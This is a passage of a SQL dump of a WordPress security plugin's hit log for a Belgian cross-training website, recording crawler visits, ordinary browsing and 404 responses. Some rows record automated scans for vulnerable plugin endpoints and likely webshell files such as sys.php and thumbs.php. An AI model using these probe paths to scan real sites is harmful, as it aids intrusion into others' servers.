(74132, 1496248940.301252, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php', '', ''),
(74133, 1496248941.145272, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php', '', ''),
(74134, 1496248941.946501, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cysteme-finder/php/connector.php?wphome=./', '', ''),
(74135, 1496253770.779953, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74136, 1496253771.578240, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74137, 1496253772.000654, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74138, 1496253772.436106, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74139, 1496253772.863685, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74140, 1496253773.280495, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74141, 1496253773.929790, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74142, 1496253774.406508, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74143, 1496253774.966645, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74144, 1496253775.559636, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74145, 1496253776.044305, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74146, 1496254147.987073, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74147, 1496259027.852426, 1570674724, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74148, 1496261994.240342, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/languages/themes/sys.php', 'http://crosstrainingcenter.be/wp-content/languages/themes/sys.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74149, 1496261994.242284, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/system.php', 'http://crosstrainingcenter.be/wp-admin/network/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74150, 1496261994.293857, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/user/system.php', 'http://crosstrainingcenter.be/wp-admin/user/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74151, 1496261994.296120, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74152, 1496262020.164222, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74153, 1496262021.762803, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74154, 1496262021.917477, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/core.php', 'http://crosstrainingcenter.be/wp-includes/core.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74155, 1496262021.935052, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/jcrop/sys.php', 'http://crosstrainingcenter.be/wp-includes/js/jcrop/sys.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74156, 1496262021.937289, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/fonts/system.php', 'http://crosstrainingcenter.be/wp-includes/fonts/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74157, 1496262021.963986, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74158, 1496262022.043653, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/certificates/system.php', 'http://crosstrainingcenter.be/wp-includes/certificates/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74159, 1496262022.055820, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/js/helpers/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/js/helpers/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74160, 1496262022.068233, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74161, 1496262022.073166, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74162, 1496262022.075990, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/crop/sys.php', 'http://crosstrainingcenter.be/wp-includes/js/crop/sys.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74163, 1496262022.079374, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/system.php', 'http://crosstrainingcenter.be/wp-includes/js/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74164, 1496262022.092414, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74165, 1496262022.096705, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfourteen/genericons/font/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/twentyfourteen/genericons/font/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74166, 1496262022.109468, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74167, 1496262052.432427, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/theme-compat/system.php', 'http://crosstrainingcenter.be/wp-includes/theme-compat/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74168, 1496262052.520567, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/simplepie/system.php', 'http://crosstrainingcenter.be/wp-includes/simplepie/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74169, 1496262052.690479, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74170, 1496262052.840332, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74171, 1496262052.887695, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74172, 1496262052.908418, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74173, 1496262052.917128, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74174, 1496262052.919573, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74175, 1496262052.930301, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74176, 1496262052.957251, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74177, 1496262052.978838, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/text/system.php', 'http://crosstrainingcenter.be/wp-includes/text/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74178, 1496266102.947510, 1753435673, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74179, 1496266107.721566, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74180, 1496266109.543141, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74181, 1496266112.527323, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74182, 1496266117.873738, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74183, 1496266127.032139, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74184, 1496266131.913722, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74185, 1496266136.663923, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74186, 1496266142.291752, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74187, 1496275673.691270, 3024883468, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74188, 1496275808.207186, 3475901896, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74189, 1496282950.490387, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74190, 1496288671.375585, 2637637417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74191, 1496290753.479623, 1314247995, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/downloads-manager/readme.txt', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0)'),
(74192, 1496291371.289510, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74193, 1496295888.201231, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74194, 1496295888.730438, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74195, 1496295889.215753, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74196, 1496295889.824922, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74197, 1496295890.276919, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74198, 1496295890.768452, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74199, 1496295891.260600, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74200, 1496295891.672023, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74201, 1496295892.115285, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74202, 1496295892.545086, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74203, 1496295892.960854, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74204, 1496299171.471450, 1053970255, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36'),
(74205, 1496300925.443870, 3475901750, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74206, 1496300929.485261, 3475901750, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74207, 1496300986.307138, 3475901750, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74208, 1496303513.285050, 2731721828, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74209, 1496303516.649333, 2731721828, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74210, 1496310622.778561, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74211, 1496314489.742058, 2303380418, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74212, 1496318204.065213, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74213, 1496318204.573862, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74214, 1496318204.993765, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74215, 1496318205.396544, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74216, 1496318208.775975, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74217, 1496318209.265157, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74218, 1496318209.674668, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74219, 1496318210.194266, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74220, 1496318210.714682, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74221, 1496318211.157614, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74222, 1496318211.638320, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74223, 1496318212.102548, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74224, 1496318212.591297, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74225, 1496318213.087287, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74226, 1496319027.362726, 3475901896, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74227, 1496319958.229924, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74228, 1496330544.120381, 3625177169, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(74229, 1496331294.074809, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74230, 1496331294.534572, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74231, 1496331294.939589, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74232, 1496331295.364159, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74233, 1496331295.862011, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74234, 1496331296.263777, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74235, 1496331296.673501, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74236, 1496331297.110101, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74237, 1496331297.513999, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74238, 1496331297.921502, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
